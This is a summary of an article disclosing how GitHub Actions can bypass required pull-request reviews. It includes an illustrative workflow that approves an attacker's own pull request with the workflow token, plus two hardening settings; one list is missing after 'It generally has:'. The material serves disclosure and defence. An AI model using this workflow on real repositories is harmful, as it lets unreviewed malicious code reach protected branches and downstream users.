
Bypassing required reviews using GitHub Actions

3 years ago medium.com

Summary: This is a summary of an article originally published by the source (medium.com).

A newly discovered security flaw in GitHub allows leveraging GitHub Actions to bypass the required-reviews mechanism and push unreviewed code to a protected branch, potentially allowing malicious code to be used by other users or to flow down the pipeline to production. GitHub organization owners are aware of the constant need to protect their code against different types of threats, and one attack vector that is always of great concern is a compromised user account. Write permission is commonly granted to many users, as it is the base permission needed to push code directly to a repository; required reviews on protected branches exist precisely so that a single write-capable account cannot land code on its own.

Among the tools a write-capable account can drive is GitHub Actions, GitHub's CI service, which builds, tests, and deploys code by defining and running workflows from development through to production systems.

So, what does a typical GitHub organization look like? It generally has:

Practically, this means an attacker who hijacks a user account and wants to push code to a protected branch can simply push their malicious code to a new remote branch, along with a workflow with the following content:

Then the attacker opens a pull request with the intent of merging the malicious code into the protected branch.
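The workflow listing is not reproduced in this summary. The following is an added, illustrative reconstruction of the technique described above and is not the listing from the original article: a workflow that runs on the attacker's own pull request and uses the job's automatic GITHUB_TOKEN to approve that pull request, so the approval is recorded by github-actions[bot] and satisfies a "Require approvals" branch protection rule. The workflow name, job name, and step name are assumptions; `gh` is preinstalled on GitHub-hosted runners.

```yaml
# Illustrative workflow constructed for this summary, not the article's own listing.
# Committed on the attacker's feature branch next to the malicious change, so it
# runs when the attacker opens the pull request.
name: self-approve

on: pull_request            # the job runs in the context of the attacker's PR

jobs:
  approve:
    runs-on: ubuntu-latest
    # Assumption: the repository still grants the workflow token the default
    # read/write permissions. With `permissions: pull-requests: read` (or the
    # repository default set to read-only) the review call below fails with 403.
    steps:
      - name: Approve my own pull request with the workflow token
        # gh picks up GITHUB_TOKEN from the environment; the approval shows up
        # as a review by github-actions[bot] and counts towards required approvals.
        run: gh pr review --approve "$PR_URL"
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
          PR_URL: ${{ github.event.pull_request.html_url }}
```

Two controls a practitioner would want, both outside the scope of the original text: set the default GITHUB_TOKEN permissions for the repository or organization to read-only (or declare a minimal `permissions:` block in every workflow) so an attacker-authored workflow cannot write to pull requests, and keep the organization/repository setting "Allow GitHub Actions to create and approve pull requests" disabled so a bot review can never satisfy a required-reviews rule.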
